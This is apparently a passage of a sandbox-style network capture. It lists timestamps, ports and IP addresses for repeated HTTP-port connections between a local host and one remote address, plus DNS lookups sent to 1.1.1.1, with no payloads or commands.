                                                                                                                                                                                                                      Oct 31, 2024 14:26:19.728466988 CET8050000172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:19.728566885 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.233386993 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.233697891 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238544941 CET8050001172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238634109 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238676071 CET8050000172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238738060 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238836050 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.243582964 CET8050001172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152596951 CET8050001172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152808905 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152916908 CET8050001172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152966976 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.780652046 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.781099081 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786176920 CET8050001172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786190987 CET8050002172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786292076 CET5000180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786464930 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786540031 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.791692972 CET8050002172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:24.677872896 CET8050002172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:24.678101063 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.186865091 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.187186956 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222309113 CET8050003172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222388029 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222580910 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222744942 CET8050002172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222807884 CET5000280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.227529049 CET8050003172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.099616051 CET8050003172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.099760056 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.763053894 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.763477087 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.768666983 CET8050003172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.768731117 CET5000380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.768846035 CET8050004172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.768920898 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.769045115 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.773973942 CET8050004172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635559082 CET8050004172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635613918 CET8050004172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635646105 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635689020 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.208056927 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.211977005 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.213557005 CET8050004172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.213691950 CET5000480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.216967106 CET8050005172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.217051983 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.219444990 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.224261045 CET8050005172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.108320951 CET8050005172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.108341932 CET8050005172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.108409882 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.732417107 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.732722044 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737555027 CET8050006172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737628937 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737716913 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737762928 CET8050005172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737812996 CET5000580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.742634058 CET8050006172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627324104 CET8050006172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627351999 CET8050006172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627409935 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627435923 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.147332907 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.147622108 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.152514935 CET8050007172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.152586937 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.152740002 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.153157949 CET8050006172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.153208017 CET5000680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.157479048 CET8050007172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057300091 CET8050007172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057357073 CET8050007172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057362080 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057394981 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.687431097 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.687736034 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693439960 CET8050008172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693543911 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693710089 CET8050007172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693758011 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693779945 CET5000780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.700465918 CET8050008172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:39.610028028 CET8050008172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:39.610236883 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.125329018 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.125663996 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130455971 CET8050009172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130533934 CET8050008172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130542994 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130603075 CET5000880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130727053 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.135494947 CET8050009172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:42.002751112 CET8050009172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:42.002815962 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.624591112 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.624882936 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629723072 CET8050010172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629801989 CET8050009172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629805088 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629838943 CET5000980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629914999 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.634610891 CET8050010172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:44.584733009 CET8050010172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:44.584817886 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.102411985 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.106028080 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.108007908 CET8050010172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.108079910 CET5001080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.111176968 CET8050011172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.111289024 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.112869024 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.117717028 CET8050011172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.990211964 CET8050011172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.990326881 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.631166935 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.631483078 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.636295080 CET8050012172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.636310101 CET8050011172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.636380911 CET5001180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.636389971 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.643749952 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.648523092 CET8050012172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.516539097 CET8050012172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.516602039 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.033986092 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.034285069 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039236069 CET8050013172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039254904 CET8050012172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039324999 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039352894 CET5001280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039572954 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.044351101 CET8050013172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.934885025 CET8050013172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.934895992 CET8050013172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.935172081 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.562390089 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.562616110 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567517042 CET8050014172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567612886 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567806005 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567845106 CET8050013172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567934990 CET5001380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.572678089 CET8050014172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439513922 CET8050014172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439558983 CET8050014172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439609051 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439682007 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.953311920 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.953602076 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958509922 CET8050015172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958590984 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958731890 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958880901 CET8050014172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958933115 CET5001480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.963526011 CET8050015172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:56.939987898 CET8050015172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:56.940098047 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.562750101 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.562753916 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.567727089 CET8050016172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.567997932 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.567997932 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.568006039 CET8050015172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.568119049 CET5001580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.572860956 CET8050016172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.340718985 CET8050016172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.340883017 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.843628883 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.843975067 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.848834991 CET8050017172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.849050999 CET8050016172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.849219084 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.849241018 CET5001680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.849298000 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.854247093 CET8050017172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:01.600033045 CET8050017172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:01.600269079 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.265307903 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.265665054 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.270642042 CET8050018172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.270762920 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.273612022 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.279570103 CET8050018172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.284297943 CET8050017172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.284399986 CET5001780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:04.183170080 CET8050018172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:04.183233976 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.688157082 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.688455105 CET5001980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.693545103 CET8050018172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.693624973 CET5001880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.694039106 CET8050019172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.694139004 CET5001980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.694255114 CET5001980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.699104071 CET8050019172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:06.558212042 CET8050019172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:06.558316946 CET5001980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222022057 CET6254153192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222542048 CET5229053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.222728014 CET5941353192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.229768991 CET53522901.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.230401039 CET53625411.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.230412960 CET53594131.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.893219948 CET6038253192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.893219948 CET6169553192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.900721073 CET53616951.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:38.901437998 CET53603821.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.672857046 CET5365153192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.673258066 CET6205753192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.680365086 CET53620571.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:43.680381060 CET53536511.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.953084946 CET5445653192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.953084946 CET6228053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.960494995 CET53622801.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.960515976 CET53544561.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.610634089 CET5924653192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.610805035 CET6294953192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.617914915 CET53629491.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.617927074 CET53592461.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.905236006 CET6533153192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.905428886 CET6286253192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.912453890 CET53653311.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:00.914242029 CET53628621.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.680773973 CET5731553192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.685832977 CET6430953192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.687886953 CET53573151.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:05.693030119 CET53643091.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.969189882 CET6162853192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.969480991 CET5498853192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.976218939 CET53616281.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.977168083 CET53549881.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.626781940 CET6482453192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.627121925 CET6219153192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.638740063 CET53621911.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.639245033 CET53648241.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.951883078 CET5118753192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.951883078 CET5965353192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.959871054 CET53596531.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.960345984 CET53511871.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.764246941 CET4950053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.764679909 CET4953153192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.771910906 CET53495001.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.775103092 CET53495311.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.422615051 CET5121253192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.422672033 CET5383753192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.432398081 CET53512121.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.432430029 CET53538371.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.785851002 CET6063053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.786953926 CET5683653192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.793663025 CET53606301.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.796546936 CET53568361.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.563127041 CET6032753192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.624917030 CET5476353192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.632249117 CET53547631.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.719285011 CET53603271.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.910510063 CET4936953192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.920998096 CET53493691.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:50.010185003 CET6030053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:50.017549038 CET53603001.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.579276085 CET5981253192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.586900949 CET53598121.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.672873974 CET6152353192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.680430889 CET53615231.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.454194069 CET5346653192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.463676929 CET53534661.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.875622034 CET6034953192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.882936001 CET53603491.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.657006025 CET6409253192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.664279938 CET53640921.1.1.1192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.734827995 CET4936053192.168.2.91.1.1.1
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.742398977 CET53493601.1.1.1192.168.2.9
